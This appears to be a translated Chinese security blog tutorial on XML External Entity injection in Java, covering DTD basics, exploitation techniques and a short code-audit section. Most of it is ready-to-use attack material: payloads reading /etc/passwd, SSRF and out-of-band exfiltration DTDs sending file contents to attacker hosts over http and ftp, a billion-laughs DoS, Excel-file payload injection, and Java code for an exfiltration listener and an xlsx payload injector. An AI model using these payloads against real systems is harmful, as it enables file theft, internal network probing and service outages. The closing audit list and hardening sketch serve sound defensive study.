Java XXE: From Principles to Exploitation

Latest recommended article published on 2024-08-07 15:41:06

Author: 网络安全工程师老王

Tags: web security, network security

Article link: https://blog.csdn.net/2401_83799022/article/details/139346104

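XXE stands for XML External Entity Injection. I came across an article showing that an XXE attack can be carried out by uploading an xlsx file, and a quick search showed that this is a long-established technique. One point in the articles I found caught my attention: an author wrote that "since the site runs on Java, the FTP protocol is used to read the file." What does a Java site have to do with FTP? That made me realize that I understood XXE almost only in principle and knew very little about how it is exploited in practice. So I decided to study and organize the topic, since this still looks like a common web vulnerability.
XXE is of course not limited to Java; PHP, Python, C#, and other common languages are affected as well. However, exploitation, remediation, and auditing differ from language to language, and covering them all in one article would get messy. This article focuses on XXE in Java.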

XML Basics

An XML document consists of an XML declaration, an optional DTD (document type definition), and the document element.

<?xml version="1.0"?>
<!-- XML declaration (above): it must be the first thing in the document -->

<!-- Document type definition -->
<!DOCTYPE note [  <!-- declares this document to be of type note -->
<!ELEMENT note (to,from,head,body)>  <!-- note contains four child elements -->
<!ELEMENT to (#PCDATA)>     <!-- to holds #PCDATA (parsed character data) -->
<!ELEMENT from (#PCDATA)>   <!-- from holds #PCDATA -->
<!ELEMENT head (#PCDATA)>   <!-- head holds #PCDATA -->
<!ELEMENT body (#PCDATA)>   <!-- body holds #PCDATA -->
]>

<!-- Document element -->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

Since XXE vulnerabilities only involve the DTD, the rest of this article focuses on the DTD.

DTD

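DTD stands for Document Type Definition; it is introduced in a document by the XML document type declaration (<!DOCTYPE ...>). Depending on where it is declared, a DTD is either internal or external: when a DTD is declared within the file it is called an internal DTD, and when it is declared in a separate file it is called an external DTD.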

Basic syntax of a DTD:

<!DOCTYPE element DTD identifier
[
   declaration1
   declaration2
   ........
]>

Today's XXE attacks mainly rely on external DTDs.

External DTD

Complete example

example.xml:

<?xml version = "1.0" encoding = "UTF-8" standalone = "no" ?>
<!DOCTYPE address SYSTEM "address.dtd">

<address>
  <name>Tanmay Patil</name>
  <company>TutorialsPoint</company>
  <phone>(011) 123-4567</phone>
</address>

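To reference an external DTD, the standalone attribute in the XML declaration must be set to no, meaning that the document relies on declarations from an external source. (When the attribute is omitted and external markup declarations are present, no is assumed, which is why the payloads later in this article leave it out.)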
address.dtd:

<!ELEMENT address (name,company,phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT company (#PCDATA)>
<!ELEMENT phone (#PCDATA)>

system identifiers / public identifiers

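An external DTD can be referenced with either the SYSTEM or the PUBLIC identifier. Their syntax and meaning differ, but both can be used in XXE attacks.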

System Identifiers:

<!DOCTYPE name SYSTEM "address.dtd" [...]>

The system identifier can be the path of a .dtd file or a URL.

Public Identifiers:

<!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">

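Summary

DOCTYPE is the keyword that introduces the DTD declaration, and it can be used to reference an external .dtd file. This is the mechanism used when exploiting blind XXE to exfiltrate data out-of-band, which is now the mainstream XXE attack technique.
In an XXE OOB attack, the DOCTYPE declaration that references the malicious external .dtd file sits in an .xml file, and that .xml file usually has to be uploaded to the target (victim) server to be parsed. A working pair of exploit files looks like this: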

d1_step1.xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/d1_step2.dtd" >
        %include;
        %define_http;%send_http;
        ]>
<books></books>

d1_step2.dtd

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_http "<!ENTITY &#37; send_http SYSTEM 'http://localhost:1234/%file;'>">

Entities

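As mentioned at the start, XXE stands for XML External Entity Injection; entities are declared as part of the DTD body.

Like DTDs, entities are divided by where they are declared into internal entities and external entities.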

External Entity

If an entity is declared outside the DTD, it is called an external entity. You can refer to an external entity by using either a system identifier or a public identifier.

Syntax for External Entity declaration:

<!ENTITY name SYSTEM "URI/URL">

name is the name of entity.
SYSTEM is the keyword. (PUBLIC can be used instead, with the same syntax as in the DOCTYPE declaration above.)
URI/URL is the address of the external source enclosed within the double or single quotes.

Parameter entities

Entities can be classified in two ways. The first, described above, is by where they are declared: internal or external. The other is by type:

Built-in entities
Character entities
General entities
Parameter entities

The one to focus on is the last, parameter entities, which are what real XXE attacks use. The reason general entities are often not used is as follows:

Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead.

The purpose of a parameter entity is to enable you to create reusable sections of replacement text.

Syntax for parameter entity declaration:

<!ENTITY % ename "entity_value">

entity_value is any character that is not an &, % or ".

Practical Exploitation

Normal XXE

Applies when the parsed data is echoed back in the response.

Exploiting XXE to retrieve files

An external entity is defined containing the contents of a file, and returned in the application's response.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
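
To see why this works against Java, here is a minimal sketch that parses a payload of the same shape with a DocumentBuilderFactory left at its defaults. The class name XxeEchoDemo, its methods, and the temporary file standing in for a sensitive file are all illustrative assumptions, and the result may differ on runtimes that ship hardened JAXP defaults.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical demo class; names are illustrative, not from the original article.
final class XxeEchoDemo {

    // Builds a payload whose external general entity points at the given URI.
    static String payloadFor(String systemId) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
             + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"" + systemId + "\"> ]>\n"
             + "<stockCheck><productId>&xxe;</productId></stockCheck>";
    }

    // Parses with an unhardened factory and returns the text of <productId>,
    // i.e. the value an application would echo back to the client.
    static String parseProductId(String xml) {
        try {
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = builder.parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getElementsByTagName("productId").item(0).getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException("parse failed", e);
        }
    }

    // Creates a stand-in for a sensitive file and reads it through the entity.
    static String demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            Files.write(secret, "top-secret-value".getBytes(StandardCharsets.UTF_8));
            try {
                return parseProductId(payloadFor(secret.toUri().toString()));
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(demo());
    }
}
```

The point of the sketch is that no special option has to be enabled: the entity is expanded during parsing, so any code that later reads the element text also reads the file content.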

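Note that if the file contains characters that are special in XML (such as < or &), the parser will try to interpret them as markup instead of returning them as text. Since the goal is simply to obtain the complete file content, CDATA can be combined with parameter entities.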
xml_payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///d:/test.txt">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 
%dtd; ]> 

<roottag>&all;</roottag>

evil.dtd:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

For network reconnaissance, files worth reading include /etc/network/interfaces, /proc/net/arp, and /etc/hosts.

Exploiting XXE to perform SSRF attacks

An external entity is defined based on a URL to a back-end system.

<!--General entities-->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<!--Parameter entities-->
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

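This is commonly used to probe internal hosts; the result is judged directly from the echoed response.

Blind XXE

In real-world environments today there is almost never an echo, so the data has to be carried out some other way.

Exploiting blind XXE to exfiltrate data out-of-band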

Sensitive data is transmitted from the application server to a system that the attacker controls.
step1.xml:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/step2.dtd" >
        %include;
        %define_http;%send_http;
        ]>
<books></books>

step2.dtd:

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_http "<!ENTITY &#37; send_http SYSTEM 'http://localhost:1234/%file;'>">

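The parsing process is as follows:

The parameter entities involved are %include, %define_http, %send_http, and %file.
%include is referenced first; it requests the .dtd file from the remote server and includes it. (A local file is used here for testing; it can be replaced with "http://ip/xxxx.dtd".)
%define_http is expanded next. It first fetches the content of %file, splices it into the URL, and uses the result to declare %send_http. Because a literal % is not allowed inside an entity value, it is written as the character reference &#37; or &#x25;.
%send_http is expanded, which sends a request whose URL contains the content of %file.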
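
On the receiving side, all the attacker needs is something that records the requested path. The following is a minimal sketch of such a listener using the JDK's built-in com.sun.net.httpserver.HttpServer; the class name OobListener, the sample path, and the choice of a 204 response are assumptions for illustration. The article's payload targets port 1234, while the self-check below uses port 0 so the OS picks a free port.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.URI;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;

// Hypothetical attacker-side listener; class and method names are illustrative.
final class OobListener {
    private final HttpServer server;
    private final List<String> captured = new CopyOnWriteArrayList<>();

    // Port 0 lets the OS choose a free port.
    OobListener(int port) {
        try {
            server = HttpServer.create(new InetSocketAddress("127.0.0.1", port), 0);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        server.createContext("/", exchange -> {
            // With the step2.dtd payload, the file content arrives as the request path.
            captured.add(exchange.getRequestURI().getRawPath());
            exchange.sendResponseHeaders(204, -1); // 204 No Content, no body
            exchange.close();
        });
        server.start();
    }

    int port() { return server.getAddress().getPort(); }
    List<String> captured() { return captured; }
    void stop() { server.stop(0); }

    // Simulates the request that %send_http would trigger and returns what was logged.
    static String demo() {
        OobListener listener = new OobListener(0);
        try {
            URI uri = URI.create("http://127.0.0.1:" + listener.port() + "/line-of-file-content");
            HttpURLConnection conn = (HttpURLConnection) uri.toURL().openConnection();
            conn.getResponseCode(); // forces the request to be sent
            return listener.captured().get(0);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } finally {
            listener.stop();
        }
    }

    public static void main(String[] args) {
        OobListener listener = new OobListener(1234);
        System.out.println("listening on port " + listener.port());
    }
}
```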

Exploiting blind XXE to retrieve data via error messages

Attacker can trigger a parsing error message containing sensitive data.
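Strictly speaking, it is hard to get data echoed this way, because the details of Java error messages are usually not visible nowadays.
For details, see: https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages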

Exploiting XXE with local DTD files

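This resembles an upgraded version of "Exploiting blind XXE to retrieve data via error messages" above. Almost all of the attacks described so far have to request a .dtd file from a remote server, which is impossible when a firewall blocks outbound traffic. Arseniy Sharoglazov therefore proposed (~2016-2018) using local DTD files for error-based file disclosure.
In short, the .dtd on the remote server is replaced with a DTD that already exists on the target server; one of its parameter entities is redefined, and the result is combined with an error message to get the data echoed. Candidate local DTDs are found by collecting the default DTD paths shipped with various systems and applications.

For full details, see https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-/
Related tool: https://github.com/GoSecure/dtd-finder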

JSON content-type XXE

Original request and response:
HTTP Request:
POST /netspi HTTP/1.1
Host: http://someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38
{"search":"name","value":"netspitest"}
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43
{"error": "no results for name netspitest"}
Now try changing the Content-Type to application/xml.
Follow-up request and response:
HTTP Request:
POST /netspi HTTP/1.1
Host: http://someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38
{"search":"name","value":"netspitest"}
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127
{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}
The error shows that the server is able to process XML data, so this can be used for the attack.
Final request and response:
HTTP Request:
POST /netspi HTTP/1.1
Host: http://someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467
{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....

DoS

In the nested entity references below, the expanded size grows exponentially from the bottom up:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
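Recall the parsing process: when the XML processor loads this document, it finds the root element lolz, which contains the entity reference &lol9;, and the lol9 entity expands to the string "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;".
Each level expands in the same way, so the data pushed into memory grows exponentially. Reported experiments show that an XML payload smaller than 1 KB can consume 3 GB of memory.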
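
As a rough check of the growth, the sketch below counts how many copies of the base entity the payload above produces. The class EntityExpansion and its methods are hypothetical helpers; the count covers only the expanded text, not the parser's own memory overhead, so it does not by itself reproduce the 3 GB figure.

```java
// Hypothetical helper: estimates how large the nested entities become.
final class EntityExpansion {

    // Copies of the base entity after `levels` nested entities, each of which
    // repeats the previous one `fanOut` times (lol2..lol9 above is 8 levels of 10).
    static long copies(int levels, int fanOut) {
        long total = 1;
        for (int i = 0; i < levels; i++) {
            total = Math.multiplyExact(total, fanOut); // throws on overflow
        }
        return total;
    }

    // Characters in the fully expanded text for a given base entity value.
    static long expandedChars(String base, int levels, int fanOut) {
        return Math.multiplyExact(copies(levels, fanOut), (long) base.length());
    }

    public static void main(String[] args) {
        System.out.println("copies of lol: " + copies(8, 10));
        System.out.println("expanded characters: " + expandedChars("lol", 8, 10));
    }
}
```

For the payload as written, that is 10^8 copies of "lol", or 3 x 10^8 characters, from a document well under 1 KB.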

I have not tested this myself, but it was the first time I learned that XXE can be used for DoS in this way.

Excel XXE

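This technique appears to have first been described in this article: https://www.4armed.com/blog/exploiting-xxe-with-excel/
Although it is called Excel XXE here, it applies equally to Word and PowerPoint files; Excel uploads are simply more common in practice.
Create a Microsoft pptx/docx/xlsx file (on macOS in my case), then unzip it as a zip archive.

It is not really different from a normal XXE attack: the payload is placed in one of the extracted XML files, the files are zipped back into a pptx/docx/xlsx, and the XXE payload is triggered when the uploaded file is parsed.
However, the payload is not triggered from just any XML file. For Excel, it can be placed in xl/workbook.xml, because most applications seem to feed xl/workbook.xml to their XML parser to obtain the list of worksheets and then read each sheet separately for the cell contents.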
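
The unzip, edit, and re-zip steps can be sketched in Java with java.util.zip, for use in authorized testing. XlsxPayloadInjector, its methods, and the attacker.example URL are hypothetical names chosen for illustration; the sketch assumes workbook.xml is UTF-8 without a byte order mark and requires Java 9+ for readAllBytes.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

// Hypothetical helper for authorized testing; all names are illustrative.
final class XlsxPayloadInjector {
    static final String TARGET_ENTRY = "xl/workbook.xml";

    // Places the DOCTYPE directly after the XML declaration (or at the start if there is none).
    static String injectDoctype(String xml, String doctype) {
        int end = xml.startsWith("<?xml") ? xml.indexOf("?>") : -1;
        int declEnd = end < 0 ? 0 : end + 2;
        return xml.substring(0, declEnd) + "\n" + doctype + "\n" + xml.substring(declEnd);
    }

    // Copies every entry of the archive, rewriting only xl/workbook.xml.
    static byte[] inject(byte[] xlsx, String doctype) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try (ZipInputStream zin = new ZipInputStream(new ByteArrayInputStream(xlsx));
             ZipOutputStream zout = new ZipOutputStream(out)) {
            ZipEntry entry;
            while ((entry = zin.getNextEntry()) != null) {
                byte[] data = zin.readAllBytes(); // reads to the end of the current entry
                if (TARGET_ENTRY.equals(entry.getName())) {
                    String xml = new String(data, StandardCharsets.UTF_8);
                    data = injectDoctype(xml, doctype).getBytes(StandardCharsets.UTF_8);
                }
                zout.putNextEntry(new ZipEntry(entry.getName()));
                zout.write(data);
                zout.closeEntry();
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return out.toByteArray(); // read only after the zip stream has been closed
    }

    // Returns the text of one entry, or null if the archive has no such entry.
    static String readEntry(byte[] zip, String name) {
        try (ZipInputStream zin = new ZipInputStream(new ByteArrayInputStream(zip))) {
            ZipEntry entry;
            while ((entry = zin.getNextEntry()) != null) {
                if (name.equals(entry.getName())) {
                    return new String(zin.readAllBytes(), StandardCharsets.UTF_8);
                }
            }
            return null;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Builds a one-entry stand-in archive (not a real workbook), injects, and returns the result.
    static String demo() {
        ByteArrayOutputStream raw = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(raw)) {
            zout.putNextEntry(new ZipEntry(TARGET_ENTRY));
            zout.write("<?xml version=\"1.0\"?><workbook/>".getBytes(StandardCharsets.UTF_8));
            zout.closeEntry();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        String doctype =
                "<!DOCTYPE x [ <!ENTITY % xxe SYSTEM \"http://attacker.example/evil.dtd\"> %xxe; ]>";
        return readEntry(inject(raw.toByteArray(), doctype), TARGET_ENTRY);
    }

    public static void main(String[] args) {
        System.out.println(demo());
    }
}
```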

Protocol Support

http

d1_step1.xml :

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/d1_step2.dtd" >
        %include;
        %define_http;%send_http;
        ]>
<books></books>

d1_step2.dtd :

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_http "<!ENTITY &#37; send_http SYSTEM 'http://localhost:1234/%file;'>">

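When Java handles an http URL, a string containing the newline character \n causes an exception to be thrown immediately. Since data exfiltrated over http can essentially only be appended to the URL, exfiltration fails whenever the data contains a newline. For Java, http is therefore not the preferred exfiltration channel.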

ftp

d2_step1.xml :

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xdsec[
        <!ENTITY % include SYSTEM "file:///Users/any/Downloads/java_xxe_2019/d2_step2.dtd" >
        %include;
        %define_ftp;%send_ftp;
        ]>
<books></books>

d2_step2.dtd :

<!ENTITY % file SYSTEM "file:///Users/any/Downloads/java_xxe_2019/multi_line.txt">
<!ENTITY % define_ftp "<!ENTITY &#37; send_ftp SYSTEM 'ftp://localhost:2121/%file;'>">

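With ftp exfiltration, only versions <7u141 and <8u162 can read an entire file, because later versions also restrict newlines.
Another researcher has summarized the version details more precisely:

When exfiltrating data over FTP through an XXE vulnerability, success depends on the Java version:
<7u141-b00 or <8u131-b09: not affected by \n in the file;
jdk8u131: the FTP connection can be created, but an exception is thrown if the exfiltrated file content contains \n;
jdk8u232: the FTP connection cannot be created; an exception is thrown as soon as the URL contains \n.

Obtaining the Java Version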

ftp.dtd :

<!ENTITY % file SYSTEM "file:///D:/data.txt">
<!ENTITY % ftp "<!ENTITY &#37; send SYSTEM 'ftp://127.0.0.1:2121/%file;'>">

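When connecting to FTP without a username and password, the client logs in as anonymous by default, and the password is the client's Java version. This can be used to learn the Java version of the target server: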

info: FTP: recvd 'USER anonymous'
info: FTP: recvd 'PASS Java1.7.0_21@'
info: FTP: recvd 'TYPE I'
info: FTP: recvd 'EPSV ALL'
info: FTP: recvd 'EPSV'
info: FTP: recvd 'EPRT |1|127.0.0.1|54357|'
info: FTP: recvd 'RETR tesdata'
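
Pulling the version out of such a log can be automated. This is a small sketch that assumes the log format shown above, where the password is "Java" followed by the version and a trailing "@"; the class FtpPassVersion and its method are hypothetical.

```java
import java.util.Optional;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper; assumes log lines shaped like the listener output above.
final class FtpPassVersion {
    // Anonymous-login password as seen in the log: "Java" + version + "@".
    private static final Pattern PASS = Pattern.compile("PASS Java([^@'\\s]+)@");

    // Returns the Java version carried in a PASS line, if the line contains one.
    static Optional<String> javaVersion(String logLine) {
        Matcher m = PASS.matcher(logLine);
        return m.find() ? Optional.of(m.group(1)) : Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(javaVersion("info: FTP: recvd 'PASS Java1.7.0_21@'"));
    }
}
```

Knowing the version matters here because, as summarized above, it decides whether multi-line files can be exfiltrated over ftp at all.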

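Special Character Restrictions

Every [\r] is replaced with [\n].
The special characters [%] and [&] break the payload completely.
The special characters ['] and ["] can be partly worked around.
The special character [?] has no effect on http but truncates the data on ftp.
The special character [/] has no effect on http, but on ftp it requires an extra parsing case.
The special character [#] truncates the data.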

jar

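This protocol currently seems of limited use for exploitation. First, the upload location and file name are unknown and can only be learned from an echoed error message. Second, the file is deleted once the transfer completes; padding the end of the file with junk so that it can be included before the transfer finishes is possible, but it is a rather tricky technique. Third, the file extension cannot be controlled; it is always .tmp.

How the jar protocol processes a file:

Download the jar/zip file to a temporary file
Extract the file we specified
Delete the temporary file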
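
The jar: URL syntax itself is easy to try locally. The sketch below builds a small zip and reads one entry through a jar: URL; JarUrlDemo and the entry content are illustrative assumptions. It uses a file: archive, which the JDK opens in place, so the download-to-temporary-file step listed above is not exercised here; that step is understood to apply to remote (for example http) archives.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.net.URI;
import java.net.URLConnection;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

// Hypothetical demo class; names are illustrative.
final class JarUrlDemo {

    // Reads one entry through a URL of the form jar:<archive-url>!/<entry>. Requires Java 9+.
    static String readEntry(String archiveUrl, String entryName) {
        try {
            URLConnection conn =
                    URI.create("jar:" + archiveUrl + "!/" + entryName).toURL().openConnection();
            conn.setUseCaches(false); // do not keep the archive open in the JVM-wide cache
            try (InputStream in = conn.getInputStream()) {
                return new String(in.readAllBytes(), StandardCharsets.UTF_8);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Creates a temporary zip with a single entry and reads it back via the jar: scheme.
    static String demo() {
        try {
            Path zip = Files.createTempFile("jar-demo", ".zip");
            try {
                try (ZipOutputStream zout = new ZipOutputStream(Files.newOutputStream(zip))) {
                    zout.putNextEntry(new ZipEntry("file/within/the/zip"));
                    zout.write("hello from inside the archive".getBytes(StandardCharsets.UTF_8));
                    zout.closeEntry();
                }
                return readEntry(zip.toUri().toString(), "file/within/the/zip");
            } finally {
                Files.deleteIfExists(zip);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(demo());
    }
}
```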

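Besides file upload, it can also be used for DoS (untested):

A jar URL such as jar:http://host/application.jar!/file/within/the/zip makes the server first fetch the archive, then unpack it and extract the file named after the ! separator. From an attacker's point of view, it is entirely possible to craft archives with a very high compression ratio (for example 1000:1). Such ZIP bombs can be used to attack antivirus systems or to exhaust the target machine's disk or memory.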

netdoc

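In XXE this protocol serves the same purpose as file: both are used to read files.

It can also be used to list directories.

The file protocol can list directories as well.

Code Audit

XML parsing is typically found where configuration is imported, in data-exchange interfaces, and in similar scenarios. Wherever XML is processed, check whether the XML parser disables external entities to determine whether XXE is possible. Some XML parsing interfaces (the classes and functions where the vulnerability commonly appears) are:

javax.xml.parsers.DocumentBuilderFactory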
javax.xml.parsers.SAXParser
javax.xml.transform.TransformerFactory
javax.xml.validation.Validator
javax.xml.validation.SchemaFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.transform.sax.SAXSource
org.xml.sax.XMLReader
DocumentHelper.parseText
DocumentBuilder
org.xml.sax.helpers.XMLReaderFactory
org.dom4j.io.SAXReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
javax.xml.bind.Unmarshaller
javax.xml.xpath.XPathExpression
javax.xml.stream.XMLStreamReader
org.apache.commons.digester3.Digester
org.xml.sax.SAXParseException publicId
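
When auditing one of these entry points, the question is whether the parser was configured along the following lines before use. This is a minimal sketch for DocumentBuilderFactory only, assuming the JDK's built-in (Xerces-based) parser, which recognizes the disallow-doctype-decl feature; the class HardenedXmlParsing and its methods are hypothetical, and other parser classes in the list need their own equivalent settings.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical audit helper; names are illustrative.
final class HardenedXmlParsing {

    // A factory that refuses any document containing a DOCTYPE declaration.
    static DocumentBuilderFactory hardenedFactory() {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            // Feature of the Xerces-based parser bundled with the JDK (assumed here).
            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            dbf.setXIncludeAware(false);
            dbf.setExpandEntityReferences(false);
            return dbf;
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException("parser does not support hardening features", e);
        }
    }

    // Returns true if the hardened parser rejects the document, false if it parses.
    static boolean rejects(String xml) {
        try {
            hardenedFactory().newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            return true; // DOCTYPE present (or otherwise malformed input)
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String payload = "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>"
                       + "<foo>&xxe;</foo>";
        System.out.println("payload rejected: " + rejects(payload));
        System.out.println("plain XML rejected: " + rejects("<foo>ok</foo>"));
    }
}
```

Rejecting DOCTYPE outright is the bluntest option; it blocks every payload in this article because all of them depend on a DTD, at the cost of refusing legitimate documents that carry one.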
